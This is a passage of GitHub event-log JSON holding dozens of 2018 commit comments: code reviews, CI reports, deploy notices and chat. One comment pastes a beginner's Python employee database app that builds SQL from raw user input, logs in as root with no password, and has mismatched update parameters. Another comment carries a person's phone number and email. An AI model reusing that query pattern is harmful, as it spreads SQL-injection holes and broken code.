AAAAA\r\n```"}},"created_at":"2018-07-30T14:19:47Z"}
{"id":"8038021114","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"Railcraft/Railcraft"},"payload":{"comment":{"id":29887679,"position":51,"line":71,"path":"src/main/java/mods/railcraft/common/plugins/jei/RailcraftJEIPlugin.java","commit_id":"c30f172437779b64f1af439daf69827c0217050d","created_at":"2018-07-30T14:19:55Z","updated_at":"2018-07-30T14:19:55Z","author_association":"MEMBER","body":"@Generalcamo I specifically refer to the bleached clay. I think it has a furnace recipe which it produces a bleached clay block (it's crafted from one clay and three bone meal)"}},"created_at":"2018-07-30T14:19:55Z"}
{"id":"8038021120","type":"CommitCommentEvent","actor":{"login":"cmdrkotori"},"repo":{"name":"cmdrkotori/mpc-qt"},"payload":{"comment":{"id":29887680,"position":null,"line":null,"path":null,"commit_id":"24866be4535df7a6cac5f07af41d0ead3e29e45e","created_at":"2018-07-30T14:19:55Z","updated_at":"2018-07-30T14:19:55Z","author_association":"OWNER","body":"It seems that the program icon is going to stay more or less the same now that the program is getting traction outside of github. It made it into numix circle. https://github.com/numixproject/numix-icon-theme-circle/blob/master/Numix-Circle/48/apps/mpc And it's in solus and probably elsewhere in places I do not know. Changing the icon may not be possible now. \r\n\r\n>I did contact few of the designers and I ask if they could help or if they knew someone that could (I hope you don't mind)\r\n\r\nI appreciate whatever effort the breeze designers may have made to help me. Logo design is hard. I think I would have been fine with whatever design was presented, even if it wasn't at all like my (horrible) suggestions earlier."}},"created_at":"2018-07-30T14:19:55Z"}
{"id":"8038021883","type":"CommitCommentEvent","actor":{"login":"baerkins"},"repo":{"name":"bluecadet/greene-space"},"payload":{"comment":{"id":29887681,"position":null,"line":null,"path":null,"commit_id":"5ac4778570d12402f3c5ff9d50867b24eaf3729e","created_at":"2018-07-30T14:20:03Z","updated_at":"2018-07-30T14:20:03Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-48-greene-space.pantheonsite.io/)\n\nCreated multidev environment [ci-48](https://dashboard.pantheon.io/sites/1ffe8818-30b8-4947-851f-e8a90715b486#ci-48) for greene-space."}},"created_at":"2018-07-30T14:20:03Z"}
{"id":"8038025816","type":"CommitCommentEvent","actor":{"login":"tonesto7"},"repo":{"name":"SmartThingsCommunity/SmartThingsPublic"},"payload":{"comment":{"id":29887687,"position":null,"line":null,"path":null,"commit_id":"67c45dae18738c23dad3ba08e23034bf5d7d1256","created_at":"2018-07-30T14:20:39Z","updated_at":"2018-07-30T14:20:39Z","author_association":"NONE","body":"You need to close this request. NST will not be published here"}},"created_at":"2018-07-30T14:20:39Z"}
{"id":"8038027476","type":"CommitCommentEvent","actor":{"login":"michaelandrepearce"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":29887691,"position":19,"line":574,"path":"artemis-jms-client/src/main/java/org/apache/activemq/artemis/jms/client/ActiveMQMessageProducer.java","commit_id":"a2da41ee2e347bcf8fe721bded89e4a78ca14cfb","created_at":"2018-07-30T14:20:55Z","updated_at":"2018-07-30T14:20:55Z","author_association":"CONTRIBUTOR","body":"https://github.com/apache/activemq-artemis/pull/2187/commits/74f6f1887e9c3234812d2b0997c97d30164b985e#diff-27ebccaa2ddf3732ed88750c09f43635\r\n\r\nso here it should not happen as handling the packet the correlation id is removed from the cache so simply wouldn't be found if a second confirmation packet comes."}},"created_at":"2018-07-30T14:20:55Z"}
{"id":"8038028085","type":"CommitCommentEvent","actor":{"login":"paladox"},"repo":{"name":"miraheze/mw-config"},"payload":{"comment":{"id":29887693,"position":null,"line":null,"path":null,"commit_id":"5f0d36b84129605219083e9c24caf13a185be1b3","created_at":"2018-07-30T14:21:01Z","updated_at":"2018-07-30T14:21:01Z","author_association":"MEMBER","body":"https://incubator.miraheze.org/wiki/Special:ManageWiki"}},"created_at":"2018-07-30T14:21:01Z"}
{"id":"8038028919","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887696,"position":136,"line":109,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T14:21:10Z","updated_at":"2018-07-30T14:21:10Z","author_association":"NONE","body":"How could you save gas with these 2 lines?"}},"created_at":"2018-07-30T14:21:10Z"}
{"id":"8038032183","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/mw-config"},"payload":{"comment":{"id":29887701,"position":null,"line":null,"path":null,"commit_id":"5f0d36b84129605219083e9c24caf13a185be1b3","created_at":"2018-07-30T14:21:38Z","updated_at":"2018-07-30T14:21:38Z","author_association":"MEMBER","body":"You have to set all three variables in LS like for the other wiki and set license in ManageWiki to the “no license provided” option"}},"created_at":"2018-07-30T14:21:38Z"}
{"id":"8038034036","type":"CommitCommentEvent","actor":{"login":"AUIRtz"},"repo":{"name":"AUIRtz/douban-query"},"payload":{"comment":{"id":29887705,"position":null,"line":null,"path":null,"commit_id":"5f59bec01845d50614914bc61b11d4c7e2ade916","created_at":"2018-07-30T14:21:55Z","updated_at":"2018-07-30T14:21:55Z","author_association":"OWNER","body":"项目说明"}},"created_at":"2018-07-30T14:21:55Z"}
{"id":"8038037720","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887710,"position":81,"line":81,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-30T14:22:30Z","updated_at":"2018-07-30T14:22:30Z","author_association":"NONE","body":"I suggest you apply this too."}},"created_at":"2018-07-30T14:22:30Z"}
{"id":"8038039659","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887715,"position":181,"line":137,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T14:22:48Z","updated_at":"2018-07-30T14:22:48Z","author_association":"NONE","body":"See old comment about `if else`."}},"created_at":"2018-07-30T14:22:48Z"}
{"id":"8038042901","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29887720,"position":null,"line":null,"path":null,"commit_id":"5b3c51fc84455e8dab7a950ede94d30461b2cbf2","created_at":"2018-07-30T14:23:17Z","updated_at":"2018-07-30T14:23:17Z","author_association":"COLLABORATOR","body":"Puzzle `1055-055a4c3b` disappeared from [`src/main/groovy/com/zerocracy/stk/pm/in/links/terminate_orders_wbs_on_link_removal.groovy`](https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pm/in/links/terminate_orders_wbs_on_link_removal.groovy), that's why I closed #1225. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-30T14:23:17Z"}
{"id":"8038044951","type":"CommitCommentEvent","actor":{"login":"uzwer1"},"repo":{"name":"uzwer1/citadel"},"payload":{"comment":{"id":29887722,"position":null,"line":null,"path":null,"commit_id":"3f6a40fd2281697ae5ce71ed0c15a0d247906c02","created_at":"2018-07-30T14:23:35Z","updated_at":"2018-07-30T14:23:35Z","author_association":"OWNER","body":"Simply first action."}},"created_at":"2018-07-30T14:23:35Z"}
{"id":"8038046416","type":"CommitCommentEvent","actor":{"login":"lijanjun521"},"repo":{"name":"LLMMones/select_ticket"},"payload":{"comment":{"id":29887725,"position":null,"line":null,"path":null,"commit_id":"0fffb0909cbb6baf224477c923a311ea40c90681","created_at":"2018-07-30T14:23:48Z","updated_at":"2018-07-30T14:23:48Z","author_association":"CONTRIBUTOR","body":"add login"}},"created_at":"2018-07-30T14:23:48Z"}
{"id":"8038046684","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29887726,"position":228,"line":181,"path":"RockPaperScissors.sol","commit_id":"e5e5f0de640c408ce0742728aea97f664c8667f2","created_at":"2018-07-30T14:23:51Z","updated_at":"2018-07-30T14:23:51Z","author_association":"NONE","body":"It is more like `encode`."}},"created_at":"2018-07-30T14:23:51Z"}
{"id":"8038087297","type":"CommitCommentEvent","actor":{"login":"BobDokubo2016"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29887805,"position":19,"line":19,"path":"Vidly/Controllers/CustomersController.cs","commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-30T14:29:59Z","updated_at":"2018-07-30T14:29:59Z","author_association":"NONE","body":"Welcome.\n\nOn Mon, Jul 30, 2018 at 3:43 AM, TommyThan <notifications@github.com> wrote:\n\n> thank you very much, bro. Cheers!!!\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mosh-hamedani/vidly-mvc-5/commit/b727a26e1b4b88abe84a8b48208fec537db2ed43#commitcomment-29880987>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AT6-NvpEHCpuK0NZlsmmkFKaO4_CmpOmks5uLrk5gaJpZM4JEcYW>\n> .\n>\n\n\n\n-- \n*Thanks and regards,*\n*Bobmanuel Ake*\n\n*Phone#: 856-673-6393*\n*EmailAddress: bobattalentcreek@gmail.com <bobattalentcreek@gmail.com>*\n"}},"created_at":"2018-07-30T14:29:59Z"}
{"id":"8038091931","type":"CommitCommentEvent","actor":{"login":"samm82"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29887815,"position":null,"line":null,"path":null,"commit_id":"0b7a8fad0493cebdd80fb1156ad7d00b40667b88","created_at":"2018-07-30T14:30:41Z","updated_at":"2018-07-30T14:30:41Z","author_association":"COLLABORATOR","body":"Great! Thanks! 👍 "}},"created_at":"2018-07-30T14:30:41Z"}
{"id":"8038095655","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29887817,"position":null,"line":null,"path":null,"commit_id":"d1a279268a8973baba19739aee063330e5591b0d","created_at":"2018-07-30T14:31:16Z","updated_at":"2018-07-30T14:31:16Z","author_association":"CONTRIBUTOR","body":"markus just pushed a fix, but I'm not sure 100% sure of his fix\r\nhttps://github.com/LimeSurvey/LimeSurvey/commit/f539e5c1c98589855d32b85d246306cf5a085b66 "}},"created_at":"2018-07-30T14:31:16Z"}
{"id":"8038095843","type":"CommitCommentEvent","actor":{"login":"kabinleeicanfly"},"repo":{"name":"bono92/bono92"},"payload":{"comment":{"id":29887819,"position":null,"line":null,"path":null,"commit_id":"5f3cc19d32d68f315ce713da81d9e1c89e2941ef","created_at":"2018-07-30T14:31:18Z","updated_at":"2018-07-30T14:31:18Z","author_association":"NONE","body":"몽충아 권한 없어서 못올림"}},"created_at":"2018-07-30T14:31:18Z"}
{"id":"8038096905","type":"CommitCommentEvent","actor":{"login":"kabinleeicanfly"},"repo":{"name":"bono92/bono92"},"payload":{"comment":{"id":29887822,"position":null,"line":null,"path":null,"commit_id":"5f3cc19d32d68f315ce713da81d9e1c89e2941ef","created_at":"2018-07-30T14:31:28Z","updated_at":"2018-07-30T14:31:28Z","author_association":"NONE","body":"잘래 슈발"}},"created_at":"2018-07-30T14:31:28Z"}
{"id":"8038106120","type":"CommitCommentEvent","actor":{"login":"lacrioque"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29887832,"position":null,"line":null,"path":null,"commit_id":"d1a279268a8973baba19739aee063330e5591b0d","created_at":"2018-07-30T14:32:53Z","updated_at":"2018-07-30T14:32:53Z","author_association":"CONTRIBUTOR","body":"At least it fixes the front end-quota problematic."}},"created_at":"2018-07-30T14:32:53Z"}
{"id":"8038114857","type":"CommitCommentEvent","actor":{"login":"Zhanbek"},"repo":{"name":"Zhanbek/OTUS_Homework"},"payload":{"comment":{"id":29887843,"position":null,"line":null,"path":null,"commit_id":"53e8a8ca3a6b120f404b2d73a59fa2bf817d8edd","created_at":"2018-07-30T14:34:16Z","updated_at":"2018-07-30T14:34:16Z","author_association":"OWNER","body":"Last successful commit"}},"created_at":"2018-07-30T14:34:16Z"}
{"id":"8038115791","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/thf-cms"},"payload":{"comment":{"id":29887846,"position":null,"line":null,"path":null,"commit_id":"2c92b82aec408176fbb32f3a0dba37db48d98d56","created_at":"2018-07-30T14:34:24Z","updated_at":"2018-07-30T14:34:24Z","author_association":"MEMBER","body":"Created multidev environment [thf-cms#ci-19](https://dashboard.pantheon.io/sites/25812cb4-ea8c-436b-ac17-09b0c2b7598b#ci-19).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-19-thf-cms.pantheonsite.io/)"}},"created_at":"2018-07-30T14:34:24Z"}
{"id":"8038116441","type":"CommitCommentEvent","actor":{"login":"KamilJerzyWojcik"},"repo":{"name":"KamilJerzyWojcik/InternetPhoneBook"},"payload":{"comment":{"id":29887849,"position":null,"line":null,"path":null,"commit_id":"2fe40d79d3d1ef0a18a714fa697be47c2a2e52a6","created_at":"2018-07-30T14:34:30Z","updated_at":"2018-07-30T14:34:30Z","author_association":"OWNER","body":"@pwasilewski-netcode\r\nTrzeci warsztat + bootstrap"}},"created_at":"2018-07-30T14:34:30Z"}
{"id":"8038117546","type":"CommitCommentEvent","actor":{"login":"eduard-vasinskyi"},"repo":{"name":"softindex/datakernel"},"payload":{"comment":{"id":29887858,"position":null,"line":null,"path":null,"commit_id":"d314a0da9d6e7dd8a2fafd11651a5727a1a617a2","created_at":"2018-07-30T14:34:39Z","updated_at":"2018-07-30T14:34:39Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Control triggers in runtime](https://trello.com/c/J5viCQbv/174-control-triggers-in-runtime)"}},"created_at":"2018-07-30T14:34:39Z"}
{"id":"8038118377","type":"CommitCommentEvent","actor":{"login":"ZengHGitHub"},"repo":{"name":"ZengHGitHub/MyJAVAProjects"},"payload":{"comment":{"id":29887863,"position":null,"line":null,"path":null,"commit_id":"b4e6cc1c2fa132ec0d15c1ceddf3db02cf390766","created_at":"2018-07-30T14:34:47Z","updated_at":"2018-07-30T14:34:47Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-30T14:34:47Z"}
{"id":"8038118916","type":"CommitCommentEvent","actor":{"login":"demricknieladaza"},"repo":{"name":"demricknieladaza/LaravelNoobs"},"payload":{"comment":{"id":29887869,"position":null,"line":null,"path":null,"commit_id":"e2c5b73a65d12074880b2005e265af3ad5d8341b","created_at":"2018-07-30T14:34:53Z","updated_at":"2018-07-30T14:34:53Z","author_association":"OWNER","body":"w"}},"created_at":"2018-07-30T14:34:53Z"}
{"id":"8038122207","type":"CommitCommentEvent","actor":{"login":"eduard-vasinskyi"},"repo":{"name":"softindex/datakernel"},"payload":{"comment":{"id":29887880,"position":null,"line":null,"path":null,"commit_id":"d314a0da9d6e7dd8a2fafd11651a5727a1a617a2","created_at":"2018-07-30T14:35:24Z","updated_at":"2018-07-30T14:35:24Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Control triggers in runtime](https://trello.com/c/J5viCQbv/174-control-triggers-in-runtime)"}},"created_at":"2018-07-30T14:35:24Z"}
{"id":"8038124828","type":"CommitCommentEvent","actor":{"login":"joelgomes1994"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":29887886,"position":43,"line":420,"path":"source/gameengine/Ketsji/KX_Mesh.cpp","commit_id":"59d33db590c41d98e8b04d17c80d2f3e355d8d62","created_at":"2018-07-30T14:35:48Z","updated_at":"2018-07-30T14:35:48Z","author_association":"NONE","body":"@panzergame \r\nRaising a syntax error on Visual Studio 2015.\r\n![image](https://user-images.githubusercontent.com/19820741/43403839-885d939e-93ec-11e8-8389-900184d191dd.png)\r\n"}},"created_at":"2018-07-30T14:35:48Z"}
{"id":"8038124902","type":"CommitCommentEvent","actor":{"login":"krasCGQ"},"repo":{"name":"arunassain/android_device_lenovo_karate"},"payload":{"comment":{"id":29887887,"position":4,"line":3,"path":"product/display.mk","commit_id":"d989a0ec68ab85b5ec9cbb0113df3492600644a9","created_at":"2018-07-30T14:35:49Z","updated_at":"2018-07-30T14:35:49Z","author_association":"NONE","body":"Wao"}},"created_at":"2018-07-30T14:35:49Z"}
{"id":"8038125233","type":"CommitCommentEvent","actor":{"login":"drupchen"},"repo":{"name":"Esukhia/derge-kangyur"},"payload":{"comment":{"id":29887888,"position":5,"line":213,"path":"derge-kangyur-tags/089-tagged.txt","commit_id":"29fa716f4eadf25e8a4416e1efdbd6db1a2d9058","created_at":"2018-07-30T14:35:52Z","updated_at":"2018-07-30T14:35:52Z","author_association":"NONE","body":"\"ང་་མེ \" ཚེག་གཉིས་ལྷག་འདུག"}},"created_at":"2018-07-30T14:35:52Z"}
{"id":"8038125924","type":"CommitCommentEvent","actor":{"login":"jbertram"},"repo":{"name":"apache/activemq-artemis"},"payload":{"comment":{"id":29887889,"position":87,"line":948,"path":"artemis-core-client/src/main/java/org/apache/activemq/artemis/core/protocol/core/impl/ActiveMQSessionContext.java","commit_id":"a2da41ee2e347bcf8fe721bded89e4a78ca14cfb","created_at":"2018-07-30T14:35:58Z","updated_at":"2018-07-30T14:35:58Z","author_association":"CONTRIBUTOR","body":"The `if` block is based on the `requiresResponse` boolean which is based on `sendBlocking` therefore this should be honoring the send type."}},"created_at":"2018-07-30T14:35:58Z"}
{"id":"8038127469","type":"CommitCommentEvent","actor":{"login":"krasCGQ"},"repo":{"name":"arunassain/android_device_lenovo_karate"},"payload":{"comment":{"id":29887894,"position":22,"line":23,"path":"product/qcom-radio.mk","commit_id":"d989a0ec68ab85b5ec9cbb0113df3492600644a9","created_at":"2018-07-30T14:36:13Z","updated_at":"2018-07-30T14:36:13Z","author_association":"NONE","body":"Kek"}},"created_at":"2018-07-30T14:36:13Z"}
{"id":"8038127841","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29887895,"position":18,"line":1899,"path":"application/helpers/frontend_helper.php","commit_id":"f539e5c1c98589855d32b85d246306cf5a085b66","created_at":"2018-07-30T14:36:16Z","updated_at":"2018-07-30T14:36:16Z","author_association":"CONTRIBUTOR","body":"doesn't work in question by question mode. I guess \"0\" should be replaced by something else. "}},"created_at":"2018-07-30T14:36:16Z"}
{"id":"8038128923","type":"CommitCommentEvent","actor":{"login":"krasCGQ"},"repo":{"name":"arunassain/android_device_lenovo_karate"},"payload":{"comment":{"id":29887897,"position":31,"line":35,"path":"product/qcom-radio.mk","commit_id":"d989a0ec68ab85b5ec9cbb0113df3492600644a9","created_at":"2018-07-30T14:36:27Z","updated_at":"2018-07-30T14:36:27Z","author_association":"NONE","body":"Topkek"}},"created_at":"2018-07-30T14:36:27Z"}
{"id":"8038130729","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/Products.statusmessages"},"payload":{"comment":{"id":29887902,"position":null,"line":null,"path":null,"commit_id":"ae004f6d012f451f65cb1bc51aff0112969d6d5b","created_at":"2018-07-30T14:36:43Z","updated_at":"2018-07-30T14:36:43Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-Products.statusmessages/28/violations\n```\nProducts/statusmessages/tests/test_adapter.py:35:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:221:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_adapter.py:241:15: D001 found directlyProvides( replace it with zope.interface.provider\nProducts/statusmessages/tests/test_adapter.py:308:0: P102 docstring does contain unindexed parameters\nProducts/statusmessages/tests/test_encoding.py:3:1: I003 isort expected 1 blank line in imports, found 0\nProducts/statusmessages/tests/test_encoding.py:4:1: E302 expected 2 blank lines, found 1\nProducts/statusmessages/tests/test_encoding.py:14:38: C812 missing trailing comma\nProducts/statusmessages/tests/test_encoding.py:32:9: F401 'Products.statusmessages.message.Message' imported but unused\nProducts/statusmessages/tests/test_encoding.py:75:29: E203 whitespace before ','\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-30T14:36:43Z"}
{"id":"8038132417","type":"CommitCommentEvent","actor":{"login":"Honter"},"repo":{"name":"webjimmylau/vue-travel"},"payload":{"comment":{"id":29887905,"position":null,"line":null,"path":null,"commit_id":"112a84c7ce0f15e0287847af6dd914f3e6ef504f","created_at":"2018-07-30T14:37:00Z","updated_at":"2018-07-30T14:37:00Z","author_association":"NONE","body":"提个问题  8-10教程中使用本地存储后的index拆分为state和mutations，有没有发现本地存储功能没有调用？不拆分是ok的"}},"created_at":"2018-07-30T14:37:00Z"}
{"id":"8038134941","type":"CommitCommentEvent","actor":{"login":"sklasfeld"},"repo":{"name":"sklasfeld/deepTools"},"payload":{"comment":{"id":29887914,"position":null,"line":null,"path":null,"commit_id":"1e5cc773aa1b508a65b90dafab488a57ddd8babe","created_at":"2018-07-30T14:37:24Z","updated_at":"2018-07-30T14:37:24Z","author_association":"OWNER","body":"Added setting on plot_pca for user to set markers manually"}},"created_at":"2018-07-30T14:37:24Z"}
{"id":"8038139208","type":"CommitCommentEvent","actor":{"login":"baerkins"},"repo":{"name":"bluecadet/greene-space"},"payload":{"comment":{"id":29887926,"position":null,"line":null,"path":null,"commit_id":"5d3843bd0092002a6e8ff77984fdf18d42acc07e","created_at":"2018-07-30T14:38:04Z","updated_at":"2018-07-30T14:38:04Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-49-greene-space.pantheonsite.io/)\n\nCreated multidev environment [ci-49](https://dashboard.pantheon.io/sites/1ffe8818-30b8-4947-851f-e8a90715b486#ci-49) for greene-space."}},"created_at":"2018-07-30T14:38:04Z"}
{"id":"8038140542","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29887932,"position":null,"line":null,"path":null,"commit_id":"ce033af8f4259cfbe8521101fae6293bb218c3c8","created_at":"2018-07-30T14:38:16Z","updated_at":"2018-07-30T14:38:16Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - x86_64-MacOS-10.9-clang: OK (2954 of 2954 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T14:38:16Z"}
{"id":"8038141005","type":"CommitCommentEvent","actor":{"login":"shanuflash"},"repo":{"name":"Itsmoideku/Feyral-bot"},"payload":{"comment":{"id":29887935,"position":null,"line":null,"path":null,"commit_id":"f6e27c0d91137f08e0885743444581dc49492134","created_at":"2018-07-30T14:38:21Z","updated_at":"2018-07-30T14:38:21Z","author_association":"NONE","body":"Holy sheet ;___;"}},"created_at":"2018-07-30T14:38:21Z"}
{"id":"8038152334","type":"CommitCommentEvent","actor":{"login":"jandryuk"},"repo":{"name":"tklengyel/xenclient-oe"},"payload":{"comment":{"id":29887959,"position":14,"line":187,"path":"recipes-openxt/openxt/openxt-measuredlaunch/seal-system","commit_id":"a24d0a021c447121d2bb28cf2460177d0091badf","created_at":"2018-07-30T14:40:09Z","updated_at":"2018-07-30T14:40:09Z","author_association":"NONE","body":"I think these are measured into PCR 4 in the xen patch."}},"created_at":"2018-07-30T14:40:09Z"}
{"id":"8038153745","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29887963,"position":18,"line":1899,"path":"application/helpers/frontend_helper.php","commit_id":"f539e5c1c98589855d32b85d246306cf5a085b66","created_at":"2018-07-30T14:40:20Z","updated_at":"2018-07-30T14:40:20Z","author_association":"COLLABORATOR","body":"Strange, i don't see why $_SESSION['survey_'.$surveyid]['step'] can be not set in quota end. We don't delete session at a time ? "}},"created_at":"2018-07-30T14:40:20Z"}
{"id":"8038155167","type":"CommitCommentEvent","actor":{"login":"oddhack"},"repo":{"name":"KhronosGroup/Vulkan-Docs"},"payload":{"comment":{"id":29887968,"position":41,"line":3428,"path":"chapters/synchronization.txt","commit_id":"ff0c2339083b76aba0414afafdb195bba15c78d8","created_at":"2018-07-30T14:40:34Z","updated_at":"2018-07-30T14:40:34Z","author_association":"CONTRIBUTOR","body":"Good catch. The VUID pattern-matching code is very finicky and this is missing a space before the '*'. We'll fix that for next time. As for merging them, please open a separate issue."}},"created_at":"2018-07-30T14:40:34Z"}
{"id":"8038156853","type":"CommitCommentEvent","actor":{"login":"TemaSM"},"repo":{"name":"iview/iview"},"payload":{"comment":{"id":29887977,"position":null,"line":null,"path":null,"commit_id":"52cd6f4c61f8af76d43826380f5c16edd11c8376","created_at":"2018-07-30T14:40:49Z","updated_at":"2018-07-30T14:40:49Z","author_association":"NONE","body":"👍 \r\nKeep going! And more English please 😉 "}},"created_at":"2018-07-30T14:40:49Z"}
{"id":"8038157254","type":"CommitCommentEvent","actor":{"login":"smhelal"},"repo":{"name":"smhelal/smakash.github.io"},"payload":{"comment":{"id":29887980,"position":null,"line":null,"path":null,"commit_id":"0d79a16d08c6e794821f8b54ab422915d907fe13","created_at":"2018-07-30T14:40:53Z","updated_at":"2018-07-30T14:40:53Z","author_association":"OWNER","body":"[jquery.ripples-master.zip](https://github.com/smhelal/smakash.github.io/files/2241581/jquery.ripples-master.zip)\r\n"}},"created_at":"2018-07-30T14:40:53Z"}
{"id":"8038158819","type":"CommitCommentEvent","actor":{"login":"vijukamath"},"repo":{"name":"vijukamath/python"},"payload":{"comment":{"id":29887985,"position":1,"line":1,"path":"README.md","commit_id":"df94a1e9687e52e133c46cd2c71f36a5003d3a33","created_at":"2018-07-30T14:41:08Z","updated_at":"2018-07-30T14:41:08Z","author_association":"OWNER","body":"\r\n# coding: utf-8\r\n\r\n# In[ ]:\r\n\r\n#EMPLOYEE MANAGEMENT SYSTEM\r\nimport pymysql\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\ndef search():\r\n    try:\r\n        con=pymysql.connect(\"localhost\",\"root\",\"\",\"python_demo\")\r\n        cur=con.cursor()\r\n        sql=\"select * from employee where employee_id='%s'\"%employee_id.get()\r\n        cur.execute(sql)\r\n        result=cur.fetchone()\r\n        employee_name.set(result[1])\r\n        employee_salary.set(result[2])\r\n        employee_age.set(result[3])\r\n        employee_hiredate.set(result[4])\r\n        employee_address.set(result[5])\r\n        e1.configure(state='disabled')\r\n        con.close()\r\n    except:\r\n        messagebox.showinfo('No Data','No such data available...')\r\n        clear()\r\ndef clear():\r\n    employee_id.set('')\r\n    employee_name.set('')\r\n    employee_salary.set('')\r\n    employee_age.set('')\r\n    employee_hiredate.set('')\r\n    employee_address.set('')\r\n    e1.configure(state='normal')\r\ndef add():\r\n    try:\r\n        con=pymysql.connect(\"localhost\",\"root\",\"\",\"python_demo\")\r\n        cur=con.cursor()\r\n        sql=\"insert into employee values (%s,'%s',%s,%s,'%s','%s')\"        %(employee_id.get(),employee_name.get(),employee_salary.get(),employee_age.get(),employee_hiredate.get(),employee_address.get())\r\n        cur.execute(sql)\r\n        con.commit()\r\n        con.close()\r\n        messagebox.showinfo('Success','Record saved...')\r\n    except:\r\n        messagebox.showinfo('Error','Error in data entry...')\r\n    finally:\r\n        clear()\r\ndef update():\r\n    try:\r\n        con=pymysql.connect(\"localhost\",\"root\",\"\",\"python_demo\")\r\n        cur=con.cursor()\r\n        sql=\"update employee set employee_name='%s',employee_salary=%s,employee_age=%s,employee_hiredate='%s',employee_address='%s'where employee_id=%s\"        %(employee_name.get(),employee_age.get(),employee_hiredate.get(),employee_address.get(),employee_id.get())\r\n        cur.execute(sql)\r\n        con.commit()\r\n        con.close()\r\n        messagebox.showinfo('Success','Record updated...')\r\n    except:\r\n        messagebox.showinfo('Error','Error occured...')\r\n    finally:\r\n        clear()\r\ndef delete():\r\n    try:\r\n        con=pymysql.connect(\"localhost\",\"root\",\"\",\"python_demo\")\r\n        cur=con.cursor()\r\n        sql=\"delete from student where employee_id=%s\"        %(employee_id.get())\r\n        cur.execute(sql)\r\n        con.commit()\r\n        con.close()\r\n        messagebox.showinfo('Success','Record deleted...')\r\n    except:\r\n        messagebox.showinfo('Error','Error occured...')\r\n    finally:\r\n        clear()\r\nw1=Tk()\r\nw1.title('My app')\r\nw1.geometry('500x500')\r\nptitle=Label(w1,text='''Employee Database Management System''')\r\nptitle.grid(row=0,column=0,columnspan=2)\r\n\r\n\r\n\r\nemployee_id=StringVar()\r\nemployee_name=StringVar()\r\nemployee_salary=StringVar()\r\nemployee_age=StringVar()\r\nemployee_hiredate=StringVar()\r\nemployee_address=StringVar()\r\n\r\n\r\nl1=Label(w1,text='EMPLOYEE 